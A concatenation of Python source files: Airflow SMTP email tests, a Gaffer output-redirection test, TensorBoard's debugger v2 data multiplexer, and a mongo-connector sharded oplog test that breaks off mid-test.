self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
OutputRedirectionTest.py
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import unittest
import threading
import time
import Gaffer
import GafferTest
class OutputRedirectionTest( GafferTest.TestCase ) :
def testRedirection( self ) :
out = []
err = []
with Gaffer.OutputRedirection( stdOut = out.append, stdErr = err.append ) :
sys.stdout.write( "OUT" )
print "PRINT",
sys.stderr.write( "ERR" )
self.assertEqual( out, [ "OUT", "PRINT" ] )
self.assertEqual( err, [ "ERR" ] )
sys.stdout.write( "" )
sys.stderr.write( "" )
self.assertEqual( out, [ "OUT", "PRINT" ] )
self.assertEqual( err, [ "ERR" ] )
def testThreading( self ) :
perThreadOuts = []
perThreadErrs = []
threads = []
def f( threadIndex ) :
with Gaffer.OutputRedirection( stdOut = perThreadOuts[threadIndex].append, stdErr = perThreadErrs[threadIndex].append ) :
for i in range( 0, 100 ) :
sys.stdout.write( "OUT %d %d" % ( threadIndex, i ) )
sys.stderr.write( "ERR %d %d" % ( threadIndex, i ) )
time.sleep( 0.001 )
for i in range( 0, 100 ) :
perThreadOuts.append( [] )
perThreadErrs.append( [] )
t = threading.Thread( target = f, args = ( i, ) )
threads.append( t )
t.start()
for t in threads :
t.join()
for i in range( 0, 100 ) :
self.assertEqual( len( perThreadOuts[i] ), 100 )
self.assertEqual( len( perThreadErrs[i] ), 100 )
for j in range( 0, 100 ) :
self.assertEqual( perThreadOuts[i][j], "OUT %d %d" % ( i, j ) )
self.assertEqual( perThreadErrs[i][j], "ERR %d %d" % ( i, j ) )
if __name__ == "__main__":
unittest.main()
|
debug_data_multiplexer.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A wrapper around DebugDataReader used for retrieving tfdbg v2 data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorboard import errors
# Dummy run name for the debugger.
# Currently, the `DebuggerV2ExperimentMultiplexer` class is tied to a single
# logdir, which holds at most one DebugEvent file set in the tfdbg v2 (tfdbg2
# for short) format.
# TODO(cais): When tfdbg2 allows there to be multiple DebugEvent file sets in
# the same logdir, replace this magic string with actual run names.
DEFAULT_DEBUGGER_RUN_NAME = "__default_debugger_run__"
# Default number of alerts per monitor type.
# Limiting the number of alerts is based on the consideration that usually
# only the first few alerting events are the most critical and the subsequent
# ones are either repetitions of the earlier ones or caused by the earlier ones.
DEFAULT_PER_TYPE_ALERT_LIMIT = 1000
def run_in_background(target):
"""Run a target task in the background.
In the context of this module, `target` is the `update()` method of the
underlying reader for tfdbg2-format data.
This method is mocked by unit tests for deterministic behaviors during
testing.
Args:
target: The target task to run in the background, a callable with no args.
"""
# TODO(cais): Implement repetition with sleeping periods in between.
# TODO(cais): Add more unit tests in debug_data_multiplexer_test.py when the
# the behavior gets more complex.
thread = threading.Thread(target=target)
thread.start()
def _alert_to_json(alert):
# TODO(cais): Replace this with Alert.to_json() when supported by the
# backend.
from tensorflow.python.debug.lib import debug_events_monitors
if isinstance(alert, debug_events_monitors.InfNanAlert):
return {
"alert_type": "InfNanAlert",
"op_type": alert.op_type,
"output_slot": alert.output_slot,
# TODO(cais): Once supported by backend, add 'op_name' key
# for intra-graph execution events.
"size": alert.size,
"num_neg_inf": alert.num_neg_inf,
"num_pos_inf": alert.num_pos_inf,
"num_nan": alert.num_nan,
"execution_index": alert.execution_index,
"graph_execution_trace_index": alert.graph_execution_trace_index,
}
else:
raise TypeError("Unrecognized alert subtype: %s" % type(alert))
class DebuggerV2EventMultiplexer(object):
"""A class used for accessing tfdbg v2 DebugEvent data on local filesystem.
This class is a short-term hack, mirroring the EventMultiplexer for the main
TensorBoard plugins (e.g., scalar, histogram and graphs.) As such, it only
implements the methods relevant to the Debugger V2 pluggin.
TODO(cais): Integrate it with EventMultiplexer and use the integrated class
from MultiplexerDataProvider for a single path of accessing debugger and
non-debugger data.
"""
def __init__(self, logdir):
"""Constructor for the `DebugEventMultiplexer`.
Args:
logdir: Path to the directory to load the tfdbg v2 data from.
"""
self._logdir = logdir
self._reader = None
def FirstEventTimestamp(self, run):
"""Return the timestamp of the first DebugEvent of the given run.
This may perform I/O if no events have been loaded yet for the run.
Args:
run: A string name of the run for which the timestamp is retrieved.
This currently must be hardcoded as `DEFAULT_DEBUGGER_RUN_NAME`,
as each logdir contains at most one DebugEvent file set (i.e., a
run of a tfdbg2-instrumented TensorFlow program.)
Returns:
The wall_time of the first event of the run, which will be in seconds
since the epoch as a `float`.
"""
if self._reader is None:
raise ValueError("No tfdbg2 runs exists.")
if run != DEFAULT_DEBUGGER_RUN_NAME:
raise ValueError(
"Expected run name to be %s, but got %s"
% (DEFAULT_DEBUGGER_RUN_NAME, run)
)
return self._reader.starting_wall_time()
def PluginRunToTagToContent(self, plugin_name):
raise NotImplementedError(
"DebugDataMultiplexer.PluginRunToTagToContent() has not been "
"implemented yet."
)
def Runs(self):
"""Return all the run names in the `EventMultiplexer`.
The `Run()` method of this class is specialized for the tfdbg2-format
DebugEvent files. It only returns runs
Returns:
If tfdbg2-format data exists in the `logdir` of this object, returns:
```
{runName: { "debugger-v2": [tag1, tag2, tag3] } }
```
where `runName` is the hard-coded string `DEFAULT_DEBUGGER_RUN_NAME`
string. This is related to the fact that tfdbg2 currently contains
at most one DebugEvent file set per directory.
If no tfdbg2-format data exists in the `logdir`, an empty `dict`.
"""
if self._reader is None:
try:
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_monitors
self._reader = debug_events_reader.DebugDataReader(self._logdir)
self._monitors = [
debug_events_monitors.InfNanMonitor(
self._reader, limit=DEFAULT_PER_TYPE_ALERT_LIMIT
)
]
# NOTE(cais): Currently each logdir is enforced to have only one
# DebugEvent file set. So we add hard-coded default run name.
run_in_background(self._reader.update)
# TODO(cais): Start off a reading thread here, instead of being
# called only once here.
except ImportError:
# This ensures graceful behavior when tensorflow install is
# unavailable.
return {}
except AttributeError:
# Gracefully fail for users without the required API changes to
# debug_events_reader.DebugDataReader introduced in
# TF 2.1.0.dev20200103. This should be safe to remove when
# TF 2.2 is released.
return {}
except ValueError:
# When no DebugEvent file set is found in the logdir, a
# `ValueError` is thrown.
return {}
return {
DEFAULT_DEBUGGER_RUN_NAME: {
# TODO(cais): Add the semantically meaningful tag names such as
# 'execution_digests_book', 'alerts_book'
"debugger-v2": []
}
}
def _checkBeginEndIndices(self, begin, end, total_count):
if begin < 0:
raise errors.InvalidArgumentError(
"Invalid begin index (%d)" % begin
)
if end > total_count:
raise errors.InvalidArgumentError(
"end index (%d) out of bounds (%d)" % (end, total_count)
)
if end >= 0 and end < begin:
raise errors.InvalidArgumentError(
"end index (%d) is unexpectedly less than begin index (%d)"
% (end, begin)
)
if end < 0: # This means all digests.
end = total_count
return end
def Alerts(self, run, begin, end, alert_type_filter=None):
"""Get alerts from the debugged TensorFlow program.
Args:
run: The tfdbg2 run to get Alerts from.
begin: Beginning alert index.
end: Ending alert index.
alert_type_filter: Optional filter string for alert type, used to
restrict retrieved alerts data to a single type. If used,
`begin` and `end` refer to the beginning and ending indices within
the filtered alert type.
"""
from tensorflow.python.debug.lib import debug_events_monitors
runs = self.Runs()
if run not in runs:
return None
alerts = []
alerts_breakdown = dict()
alerts_by_type = dict()
for monitor in self._monitors:
monitor_alerts = monitor.alerts()
if not monitor_alerts:
continue
alerts.extend(monitor_alerts)
# TODO(cais): Replace this with Alert.to_json() when
# monitor.alert_type() is available.
if isinstance(monitor, debug_events_monitors.InfNanMonitor):
alert_type = "InfNanAlert"
else:
alert_type = "__MiscellaneousAlert__"
alerts_breakdown[alert_type] = len(monitor_alerts)
alerts_by_type[alert_type] = monitor_alerts
num_alerts = len(alerts)
if alert_type_filter is not None:
if alert_type_filter not in alerts_breakdown:
raise errors.InvalidArgumentError(
"Filtering of alerts failed: alert type %s does not exist"
% alert_type_filter
)
alerts = alerts_by_type[alert_type_filter]
end = self._checkBeginEndIndices(begin, end, len(alerts))
return {
"begin": begin,
"end": end,
"alert_type": alert_type_filter,
"num_alerts": num_alerts,
"alerts_breakdown": alerts_breakdown,
"per_type_alert_limit": DEFAULT_PER_TYPE_ALERT_LIMIT,
"alerts": [_alert_to_json(alert) for alert in alerts[begin:end]],
}
def ExecutionDigests(self, run, begin, end):
"""Get ExecutionDigests.
Args:
run: The tfdbg2 run to get `ExecutionDigest`s from.
begin: Beginning execution index.
end: Ending execution index.
Returns:
A JSON-serializable object containing the `ExecutionDigest`s and
related meta-information
"""
runs = self.Runs()
if run not in runs:
return None
# TODO(cais): For scalability, use begin and end kwargs when available in
# `DebugDataReader.execution()`.`
execution_digests = self._reader.executions(digest=True)
end = self._checkBeginEndIndices(begin, end, len(execution_digests))
return {
"begin": begin,
"end": end,
"num_digests": len(execution_digests),
"execution_digests": [
digest.to_json() for digest in execution_digests[begin:end]
],
}
def ExecutionData(self, run, begin, end):
"""Get Execution data objects (Detailed, non-digest form).
Args:
run: The tfdbg2 run to get `ExecutionDigest`s from.
begin: Beginning execution index.
end: Ending execution index.
Returns:
A JSON-serializable object containing the `ExecutionDigest`s and
related meta-information
"""
runs = self.Runs()
if run not in runs:
return None
# TODO(cais): For scalability, use begin and end kwargs when available in
# `DebugDataReader.execution()`.`
execution_digests = self._reader.executions(digest=True)
end = self._checkBeginEndIndices(begin, end, len(execution_digests))
execution_digests = execution_digests[begin:end]
executions = [
self._reader.read_execution(digest) for digest in execution_digests
]
return {
"begin": begin,
"end": end,
"executions": [execution.to_json() for execution in executions],
}
def SourceFileList(self, run):
runs = self.Runs()
if run not in runs:
return None
return self._reader.source_file_list()
def SourceLines(self, run, index):
runs = self.Runs()
if run not in runs:
return None
try:
host_name, file_path = self._reader.source_file_list()[index]
except IndexError:
raise errors.NotFoundError(
"There is no source-code file at index %d" % index
)
return {
"host_name": host_name,
"file_path": file_path,
"lines": self._reader.source_lines(host_name, file_path),
}
def StackFrames(self, run, stack_frame_ids):
runs = self.Runs()
if run not in runs:
return None
stack_frames = []
for stack_frame_id in stack_frame_ids:
if stack_frame_id not in self._reader._stack_frame_by_id:
raise errors.NotFoundError(
"Cannot find stack frame with ID %s" % stack_frame_id
)
# TODO(cais): Use public method (`stack_frame_by_id()`) when
# available.
# pylint: disable=protected-access
stack_frames.append(self._reader._stack_frame_by_id[stack_frame_id])
# pylint: enable=protected-access
return {"stack_frames": stack_frames}
|
test_oplog_manager_sharded.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
import threading
import time
import bson
import pymongo
from pymongo.read_preferences import ReadPreference
from pymongo.write_concern import WriteConcern
sys.path[0:0] = [""]
from mongo_connector.doc_managers.doc_manager_simulator import DocManager
from mongo_connector.locking_dict import LockingDict
from mongo_connector.oplog_manager import OplogThread
from mongo_connector.test_utils import (ShardedCluster,
assert_soon,
close_client)
from mongo_connector.util import retry_until_ok, bson_ts_to_long
from tests import unittest, SkipTest
class TestOplogManagerSharded(unittest.TestCase):
"""Defines all test cases for OplogThreads running on a sharded
cluster
"""
def setUp(self):
""" Initialize the cluster:
Clean out the databases used by the tests
Make connections to mongos, mongods
Create and shard test collections
Create OplogThreads
"""
self.cluster = ShardedCluster().start()
# Connection to mongos
self.mongos_conn = self.cluster.client()
# Connections to the shards
self.shard1_conn = self.cluster.shards[0].client()
self.shard2_conn = self.cluster.shards[1].client()
self.shard1_secondary_conn = self.cluster.shards[0].secondary.client(
read_preference=ReadPreference.SECONDARY_PREFERRED)
self.shard2_secondary_conn = self.cluster.shards[1].secondary.client(
read_preference=ReadPreference.SECONDARY_PREFERRED
)
# Wipe any test data
self.mongos_conn["test"]["mcsharded"].drop()
# Create and shard the collection test.mcsharded on the "i" field
self.mongos_conn["test"]["mcsharded"].create_index("i")
self.mongos_conn.admin.command("enableSharding", "test")
self.mongos_conn.admin.command("shardCollection",
"test.mcsharded",
key={"i": 1})
# Pre-split the collection so that:
# i < 1000 lives on shard1
# i >= 1000 lives on shard2
self.mongos_conn.admin.command(bson.SON([
("split", "test.mcsharded"),
("middle", {"i": 1000})
]))
# disable the balancer
self.mongos_conn.config.settings.update_one(
{"_id": "balancer"},
{"$set": {"stopped": True}},
upsert=True
)
# Move chunks to their proper places
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to='demo-set-0'
)
except pymongo.errors.OperationFailure:
pass
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1000},
to='demo-set-1'
)
except pymongo.errors.OperationFailure:
pass
# Make sure chunks are distributed correctly
self.mongos_conn["test"]["mcsharded"].insert_one({"i": 1})
self.mongos_conn["test"]["mcsharded"].insert_one({"i": 1000})
def chunks_moved():
doc1 = self.shard1_conn.test.mcsharded.find_one()
doc2 = self.shard2_conn.test.mcsharded.find_one()
if None in (doc1, doc2):
return False
return doc1['i'] == 1 and doc2['i'] == 1000
assert_soon(chunks_moved, max_tries=120,
message='chunks not moved? doc1=%r, doc2=%r' % (
self.shard1_conn.test.mcsharded.find_one(),
self.shard2_conn.test.mcsharded.find_one()))
self.mongos_conn.test.mcsharded.delete_many({})
# create a new oplog progress file
try:
os.unlink("oplog.timestamp")
except OSError:
pass
open("oplog.timestamp", "w").close()
# Oplog threads (oplog manager) for each shard
doc_manager = DocManager()
oplog_progress = LockingDict()
self.opman1 = OplogThread(
primary_client=self.shard1_conn,
doc_managers=(doc_manager,),
oplog_progress_dict=oplog_progress,
ns_set=["test.mcsharded", "test.mcunsharded"],
mongos_client=self.mongos_conn
)
self.opman2 = OplogThread(
primary_client=self.shard2_conn,
doc_managers=(doc_manager,),
oplog_progress_dict=oplog_progress,
ns_set=["test.mcsharded", "test.mcunsharded"],
mongos_client=self.mongos_conn
)
def tearDown(self):
try:
self.opman1.join()
except RuntimeError:
pass # thread may not have been started
try:
self.opman2.join()
except RuntimeError:
pass # thread may not have been started
close_client(self.mongos_conn)
close_client(self.shard1_conn)
close_client(self.shard2_conn)
close_client(self.shard1_secondary_conn)
close_client(self.shard2_secondary_conn)
self.cluster.stop()
def test_get_oplog_cursor(self):
"""Test the get_oplog_cursor method"""
# timestamp = None
cursor1 = self.opman1.get_oplog_cursor(None)
oplog1 = self.shard1_conn["local"]["oplog.rs"].find(
{'op': {'$ne': 'n'},
'ns': {'$not': re.compile(r'\.system')}})
self.assertEqual(list(cursor1), list(oplog1))
cursor2 = self.opman2.get_oplog_cursor(None)
oplog2 = self.shard2_conn["local"]["oplog.rs"].find(
{'op': {'$ne': 'n'},
'ns': {'$not': re.compile(r'\.system')}})
self.assertEqual(list(cursor2), list(oplog2))
# earliest entry is the only one at/after timestamp
doc = {"ts": bson.Timestamp(1000, 0), "i": 1}
self.mongos_conn["test"]["mcsharded"].insert_one(doc)
latest_timestamp = self.opman1.get_last_oplog_timestamp()
cursor = self.opman1.get_oplog_cursor(latest_timestamp)
self.assertNotEqual(cursor, None)
self.assertEqual(cursor.count(), 1)
next_entry_id = cursor[0]['o']['_id']
retrieved = self.mongos_conn.test.mcsharded.find_one(next_entry_id)
self.assertEqual(retrieved, doc)
# many entries before and after timestamp
for i in range(2, 2002):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i
})
oplog1 = self.shard1_conn["local"]["oplog.rs"].find(
sort=[("ts", pymongo.ASCENDING)]
)
oplog2 = self.shard2_conn["local"]["oplog.rs"].find(
sort=[("ts", pymongo.ASCENDING)]
)
# oplogs should have records for inserts performed, plus
# various other messages
oplog1_count = oplog1.count()
oplog2_count = oplog2.count()
self.assertGreaterEqual(oplog1_count, 998)
self.assertGreaterEqual(oplog2_count, 1002)
pivot1 = oplog1.skip(400).limit(-1)[0]
pivot2 = oplog2.skip(400).limit(-1)[0]
cursor1 = self.opman1.get_oplog_cursor(pivot1["ts"])
cursor2 = self.opman2.get_oplog_cursor(pivot2["ts"])
self.assertEqual(cursor1.count(), oplog1_count - 400)
self.assertEqual(cursor2.count(), oplog2_count - 400)
def test_get_last_oplog_timestamp(self):
"""Test the get_last_oplog_timestamp method"""
# "empty" the oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
self.assertEqual(self.opman1.get_last_oplog_timestamp(), None)
self.assertEqual(self.opman2.get_last_oplog_timestamp(), None)
# Test non-empty oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
for i in range(1000):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i + 500
})
oplog1 = self.shard1_conn["local"]["oplog.rs"]
oplog1 = oplog1.find().sort("$natural", pymongo.DESCENDING).limit(-1)[0]
oplog2 = self.shard2_conn["local"]["oplog.rs"]
oplog2 = oplog2.find().sort("$natural", pymongo.DESCENDING).limit(-1)[0]
self.assertEqual(self.opman1.get_last_oplog_timestamp(),
oplog1["ts"])
self.assertEqual(self.opman2.get_last_oplog_timestamp(),
oplog2["ts"])
def test_dump_collection(self):
"""Test the dump_collection method
Cases:
1. empty oplog
2. non-empty oplog
"""
# Test with empty oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
last_ts1 = self.opman1.dump_collection()
last_ts2 = self.opman2.dump_collection()
self.assertEqual(last_ts1, None)
self.assertEqual(last_ts2, None)
# Test with non-empty oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
for i in range(1000):
self.mongos_conn["test"]["mcsharded"].insert_one({
"i": i + 500
})
last_ts1 = self.opman1.get_last_oplog_timestamp()
last_ts2 = self.opman2.get_last_oplog_timestamp()
self.assertEqual(last_ts1, self.opman1.dump_collection())
self.assertEqual(last_ts2, self.opman2.dump_collection())
self.assertEqual(len(self.opman1.doc_managers[0]._search()), 1000)
def test_init_cursor(self):
"""Test the init_cursor method
Cases:
1. no last checkpoint, no collection dump
2. no last checkpoint, collection dump ok and stuff to dump
3. no last checkpoint, nothing to dump, stuff in oplog
4. no last checkpoint, nothing to dump, nothing in oplog
5. no last checkpoint, no collection dump, stuff in oplog
6. last checkpoint exists
7. last checkpoint is behind
"""
# N.B. these sub-cases build off of each other and cannot be re-ordered
# without side-effects
# No last checkpoint, no collection dump, nothing in oplog
# "change oplog collection" to put nothing in oplog
self.opman1.oplog = self.shard1_conn["test"]["emptycollection"]
self.opman2.oplog = self.shard2_conn["test"]["emptycollection"]
self.opman1.collection_dump = False
self.opman2.collection_dump = False
self.assertTrue(all(doc['op'] == 'n'
for doc in self.opman1.init_cursor()[0]))
self.assertEqual(self.opman1.checkpoint, None)
self.assertTrue(all(doc['op'] == 'n'
for doc in self.opman2.init_cursor()[0]))
self.assertEqual(self.opman2.checkpoint, None)
# No last checkpoint, empty collections, nothing in oplog
self.opman1.collection_dump = self.opman2.collection_dump = True
cursor, cursor_empty = self.opman1.init_cursor()
self.assertEqual(cursor, None)
self.assertTrue(cursor_empty)
self.assertEqual(self.opman1.checkpoint, None)
cursor, cursor_empty = self.opman2.init_cursor()
self.assertEqual(cursor, None)
self.assertTrue(cursor_empty)
self.assertEqual(self.opman2.checkpoint, None)
# No last checkpoint, empty collections, something in oplog
self.opman1.oplog = self.shard1_conn["local"]["oplog.rs"]
self.opman2.oplog = self.shard2_conn["local"]["oplog.rs"]
oplog_startup_ts = self.opman2.get_last_oplog_timestamp()
collection = self.mongos_conn["test"]["mcsharded"]
collection.insert_one({"i": 1})
collection.delete_one({"i": 1})
time.sleep(3)
last_ts1 = self.opman1.get_last_oplog_timestamp()
cursor, cursor_empty = self.opman1.init_cursor()
self.assertFalse(cursor_empty)
self.assertEqual(self.opman1.checkpoint, last_ts1)
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
last_ts1)
# init_cursor should point to startup message in shard2 oplog
cursor, cursor_empty = self.opman2.init_cursor()
self.assertFalse(cursor_empty)
self.assertEqual(self.opman2.checkpoint, oplog_startup_ts)
# No last checkpoint, no collection dump, stuff in oplog
progress = LockingDict()
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.collection_dump = self.opman2.collection_dump = False
collection.insert_one({"i": 1200})
last_ts2 = self.opman2.get_last_oplog_timestamp()
self.opman1.init_cursor()
self.assertEqual(self.opman1.checkpoint, last_ts1)
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
last_ts1)
cursor, cursor_empty = self.opman2.init_cursor()
for doc in cursor:
last_doc = doc
self.assertEqual(last_doc["o"]["i"], 1200)
self.assertEqual(self.opman2.checkpoint, last_ts2)
with self.opman2.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman2.replset_name],
last_ts2)
# Last checkpoint exists
progress = LockingDict()
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
for i in range(1000):
collection.insert_one({"i": i + 500})
entry1 = list(
self.shard1_conn["local"]["oplog.rs"].find(skip=200, limit=-2))
entry2 = list(
self.shard2_conn["local"]["oplog.rs"].find(skip=200, limit=-2))
progress.get_dict()[self.opman1.replset_name] = entry1[0]["ts"]
progress.get_dict()[self.opman2.replset_name] = entry2[0]["ts"]
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.checkpoint = self.opman2.checkpoint = None
cursor1, _ = self.opman1.init_cursor()
cursor2, _ = self.opman2.init_cursor()
self.assertEqual(entry1[1]["ts"], next(cursor1)["ts"])
self.assertEqual(entry2[1]["ts"], next(cursor2)["ts"])
self.assertEqual(self.opman1.checkpoint, entry1[0]["ts"])
self.assertEqual(self.opman2.checkpoint, entry2[0]["ts"])
with self.opman1.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman1.replset_name],
entry1[0]["ts"])
with self.opman2.oplog_progress as prog:
self.assertEqual(prog.get_dict()[self.opman2.replset_name],
entry2[0]["ts"])
# Last checkpoint is behind
progress = LockingDict()
progress.get_dict()[self.opman1.replset_name] = bson.Timestamp(1, 0)
progress.get_dict()[self.opman2.replset_name] = bson.Timestamp(1, 0)
self.opman1.oplog_progress = self.opman2.oplog_progress = progress
self.opman1.checkpoint = self.opman2.checkpoint = None
cursor, cursor_empty = self.opman1.init_cursor()
self.assertTrue(cursor_empty)
self.assertEqual(cursor, None)
self.assertIsNotNone(self.opman1.checkpoint)
cursor, cursor_empty = self.opman2.init_cursor()
self.assertTrue(cursor_empty)
self.assertEqual(cursor, None)
self.assertIsNotNone(self.opman2.checkpoint)
def test_rollback(self):
"""Test the rollback method in a sharded environment
Cases:
1. Documents on both shards, rollback on one shard
2. Documents on both shards, rollback on both shards
"""
self.opman1.start()
self.opman2.start()
# Insert first documents while primaries are up
db_main = self.mongos_conn["test"]["mcsharded"]
db_main2 = db_main.with_options(write_concern=WriteConcern(w=2))
db_main2.insert_one({"i": 0})
db_main2.insert_one({"i": 1000})
self.assertEqual(self.shard1_conn["test"]["mcsharded"].count(), 1)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].count(), 1)
# Case 1: only one primary goes down, shard1 in this case
self.cluster.shards[0].primary.stop(destroy=False)
# Wait for the secondary to be promoted
shard1_secondary_admin = self.shard1_secondary_conn["admin"]
assert_soon(
lambda: shard1_secondary_admin.command("isMaster")["ismaster"])
# Insert another document. This will be rolled back later
def cond():
try:
db_main.insert_one({"i": 1})
except:
pass
return db_main.find_one({"i": 1})
retry_until_ok(cond)
